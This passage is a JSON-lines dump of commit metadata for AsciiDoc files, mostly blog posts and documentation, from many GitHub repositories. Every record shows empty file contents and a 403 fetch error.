2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dafe3754c22a2e3ed55cbf4519fc3e4eea4127bf","subject":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","message":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b344c96dc6c845b179f93c4859e35860d6efe26","subject":"new blog: a decade of OptaPlanner","message":"new blog: a decade of OptaPlanner\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2016-08-07-ADecadeOfOptaPlanner.adoc","new_file":"blog\/2016-08-07-ADecadeOfOptaPlanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc16051c247dcf3d71f3f82cf87df09e863455d3","subject":"add Finnish article","message":"add Finnish 
article\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website","old_file":"learn\/testimonialsAndCaseStudies.adoc","new_file":"learn\/testimonialsAndCaseStudies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"61ce4110e6b0f2fd946c2168d079636ca24e8b88","subject":"Update 2016-03-05-Shoes-and-Knee-Pain.adoc","message":"Update 2016-03-05-Shoes-and-Knee-Pain.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-05-Shoes-and-Knee-Pain.adoc","new_file":"_posts\/2016-03-05-Shoes-and-Knee-Pain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f69f957cd1e0c52210e3033472cc30b55babda2b","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d7fc9a1000b3c36c9a0ed1018d2cebc4959edd5","subject":"Add ScheduleDSPods","message":"Add ScheduleDSPods\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nodes-pods-daemonsets-pods.adoc","new_file":"modules\/nodes-pods-daemonsets-pods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5afcf24b75bc03ff19c6fca1b025a0c4cd29ab3","subject":"updated readme","message":"updated readme\n","repos":"BernhardLindner\/Image-Generator","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BernhardLindner\/Image-Generator.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7aba3a877d8e7aa76d51aa8ea780fd59cd1f8ea","subject":"Initial work on domain","message":"Initial work on domain\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"127cc5f047bc344d4adb6ce668c9a98fbb222aca","subject":"Update 
2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","message":"Update 2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","new_file":"_posts\/2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"510290b3a4f985233d563e99c9ebbb3deb8ffd0e","subject":"fix header attr","message":"fix header attr\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/sdk\/pages\/build_platform.adoc","new_file":"docs\/modules\/sdk\/pages\/build_platform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"1029695244c2a3c7e62df8bbc2cd29a7d4e3ca4c","subject":"update ID to UUID add collaborate + settings + url infos","message":"update ID to UUID\nadd collaborate + settings + url infos\n","repos":"adoc-editor\/editor-backend","old_file":"doc\/json\/datas-structure.adoc","new_file":"doc\/json\/datas-structure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8101a3c1eda7638e189ece3494709bc6c6ed85d9","subject":"y2b create post BlackBerry Q10 Unboxing \\u0026 Overview","message":"y2b create post BlackBerry Q10 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-07-BlackBerry-Q10-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-07-BlackBerry-Q10-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8701011ca0ad88e70201226d3128aefe4d71533c","subject":"Update 2016-05-05-Construindo-componentes-com-Angular-15.adoc","message":"Update 2016-05-05-Construindo-componentes-com-Angular-15.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-05-Construindo-componentes-com-Angular-15.adoc","new_file":"_posts\/2016-05-05-Construindo-componentes-com-Angular-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfcaf2ee5ab399aabd246a23b24d253c16f4c51f","subject":"Publish 2013-5-12-Linux-Notes.adoc","message":"Publish 
2013-5-12-Linux-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Linux-Notes.adoc","new_file":"2013-5-12-Linux-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c085a168cb8f89cfe62963b9fe14d30dd6427b22","subject":"Added symlink for Github.","message":"Added symlink for Github.\n","repos":"Yubico\/u2fval-client-php","old_file":"examples\/tutorial\/README.adoc","new_file":"examples\/tutorial\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/u2fval-client-php.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"abafff769a58d0057ee559ac61c2adc79dadf534","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"721cf9bc4833b58a81465863f613e5439d7a9909","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e45d52ee0fbbeded382ab2fd397aa55f342d75b","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"314d03ea6fc784bd575973ca0c089c8413f16d8f","subject":"Update 2017-04-14-Radiation-Camping.adoc","message":"Update 2017-04-14-Radiation-Camping.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-14-Radiation-Camping.adoc","new_file":"_posts\/2017-04-14-Radiation-Camping.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bce947cc64a5d624a46228d8074d56c3feca01e6","subject":"Update 2019-06-22-The-Ideal-Woman.adoc","message":"Update 
2019-06-22-The-Ideal-Woman.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-06-22-The-Ideal-Woman.adoc","new_file":"_posts\/2019-06-22-The-Ideal-Woman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4eb41b1fa051a30e8b8feb40e27eab904b8dc4e","subject":"corrected DMN REST API rule executions documentation (#774)","message":"corrected DMN REST API rule executions documentation (#774)\n\n","repos":"marcus-nl\/flowable-engine,yvoswillens\/flowable-engine,marcus-nl\/flowable-engine,paulstapleton\/flowable-engine,yvoswillens\/flowable-engine,lsmall\/flowable-engine,flowable\/flowable-engine,lsmall\/flowable-engine,marcus-nl\/flowable-engine,flowable\/flowable-engine,dbmalkovsky\/flowable-engine,paulstapleton\/flowable-engine,paulstapleton\/flowable-engine,dbmalkovsky\/flowable-engine,yvoswillens\/flowable-engine,marcus-nl\/flowable-engine,dbmalkovsky\/flowable-engine,dbmalkovsky\/flowable-engine,yvoswillens\/flowable-engine,flowable\/flowable-engine,flowable\/flowable-engine,lsmall\/flowable-engine,lsmall\/flowable-engine,paulstapleton\/flowable-engine","old_file":"docs\/userguide\/src\/en\/dmn\/ch07-REST.adoc","new_file":"docs\/userguide\/src\/en\/dmn\/ch07-REST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcus-nl\/flowable-engine.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05562fd83f27010af7311d1589d83f3eb52fba95","subject":"y2b create post What If You Could Get AirPods For Only $40?","message":"y2b create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-11-What%20If%20You%20Could%20Get%20AirPods%20For%20Only%20%2440%3F.adoc","new_file":"_posts\/2018-02-11-What%20If%20You%20Could%20Get%20AirPods%20For%20Only%20%2440%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e40dd55056775f1115fb6293ad86227c4c0a1205","subject":"Update 2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","message":"Update 2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","new_file":"_posts\/2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f893e6a90ce3aff0d93ff0d0bf4d34644290ad9b","subject":"Update 2015-06-16-S-RAMP.adoc","message":"Update 
2015-06-16-S-RAMP.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-06-16-S-RAMP.adoc","new_file":"_posts\/2015-06-16-S-RAMP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61dc7ec27e2ee66aa8747f144dd461fff13619a3","subject":"Update 2015-08-10-Github.adoc","message":"Update 2015-08-10-Github.adoc","repos":"Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-10-Github.adoc","new_file":"_posts\/2015-08-10-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Desarrollo-FullStack\/Desarrollo-FullStack.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b782f9353721442fb571e203a866a094814c313","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fb526efc3d38e6dc10d7e18b3b4a99b5526d5c0","subject":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2aebeb19bfcabdf676fd5328829fd177f7104f0e","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25e775a78ecfe90b5ac9de07163d52dabc151e47","subject":"y2b create post Blu Pure XL Unboxing","message":"y2b create post Blu Pure XL 
Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-03-Blu-Pure-XL-Unboxing.adoc","new_file":"_posts\/2015-12-03-Blu-Pure-XL-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1ce0d293120c7a5bc920cb9fb76d7c82b42da91","subject":"Update 2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","message":"Update 2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","new_file":"_posts\/2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12b010c7fbd6da2a0003e6b6a50d4dc48b1cb24c","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bac0debdfd38cd31ad247a931581c1934a5dcab","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b96f45711ee3b27445050318471d5a3a748d3408","subject":"y2b create post Lew is sick...","message":"y2b create post Lew is sick...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-03-Lew-is-sick.adoc","new_file":"_posts\/2016-10-03-Lew-is-sick.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ddc38c7f17099b1545aed5defc335e14d12b1a","subject":"Update 2015-08-28-Demo.adoc","message":"Update 2015-08-28-Demo.adoc","repos":"expelled\/expelled.github.io,expelled\/expelled.github.io,expelled\/expelled.github.io","old_file":"_posts\/2015-08-28-Demo.adoc","new_file":"_posts\/2015-08-28-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/expelled\/expelled.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"fa3666076ae622a1cf6d92381e3f086058a1e85e","subject":"Update 2016-01-22-Demo.adoc","message":"Update 2016-01-22-Demo.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-22-Demo.adoc","new_file":"_posts\/2016-01-22-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e565693eec98c5392721a16dfbf09614e6bc24","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9174e55a57bca9af9105916eaf76e92e16953ae8","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"038b19b471dcaec28254f585ab901f56c67a4082","subject":"Update 2015-05-04-Lancement-du-site.adoc","message":"Update 2015-05-04-Lancement-du-site.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-05-04-Lancement-du-site.adoc","new_file":"_posts\/2015-05-04-Lancement-du-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b484285f9b4137dc6a232f290aa6e634f23631f3","subject":"Update 2017-02-24-image-File-Reader.adoc","message":"Update 2017-02-24-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-image-File-Reader.adoc","new_file":"_posts\/2017-02-24-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9739ddd19a64f4f48c690f36997b9fe6310d116f","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 
2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4ee209eb8c213292ba2617ad6af8a39a53aab14","subject":"Add GitHub SUPPORT file (#1290)","message":"Add GitHub SUPPORT file (#1290)\n\n","repos":"micrometer-metrics\/micrometer,micrometer-metrics\/micrometer,micrometer-metrics\/micrometer","old_file":"SUPPORT.adoc","new_file":"SUPPORT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/micrometer-metrics\/micrometer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"892fc2e75b16067b72a51386b509ec52ce79a89b","subject":"Update 2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","message":"Update 2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","new_file":"_posts\/2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"684c4e8d396464c227a0eacb1e2bf66f015ec8a2","subject":"Adding revisions section; refactoring document; revising snippets section","message":"Adding revisions section; refactoring document; revising snippets section\n","repos":"craibuc\/ssms2012,craibuc\/ssms2012","old_file":"sqlcmd.adoc","new_file":"sqlcmd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/craibuc\/ssms2012.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38fc3c9706113d5cfa9d509af0b79fd04d2668dd","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd11012bd282f2b751f281212154a0bdfbb72612","subject":"Update 2018-05-07-study-gas-with-slack.adoc","message":"Update 2018-05-07-study-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-study-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-study-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 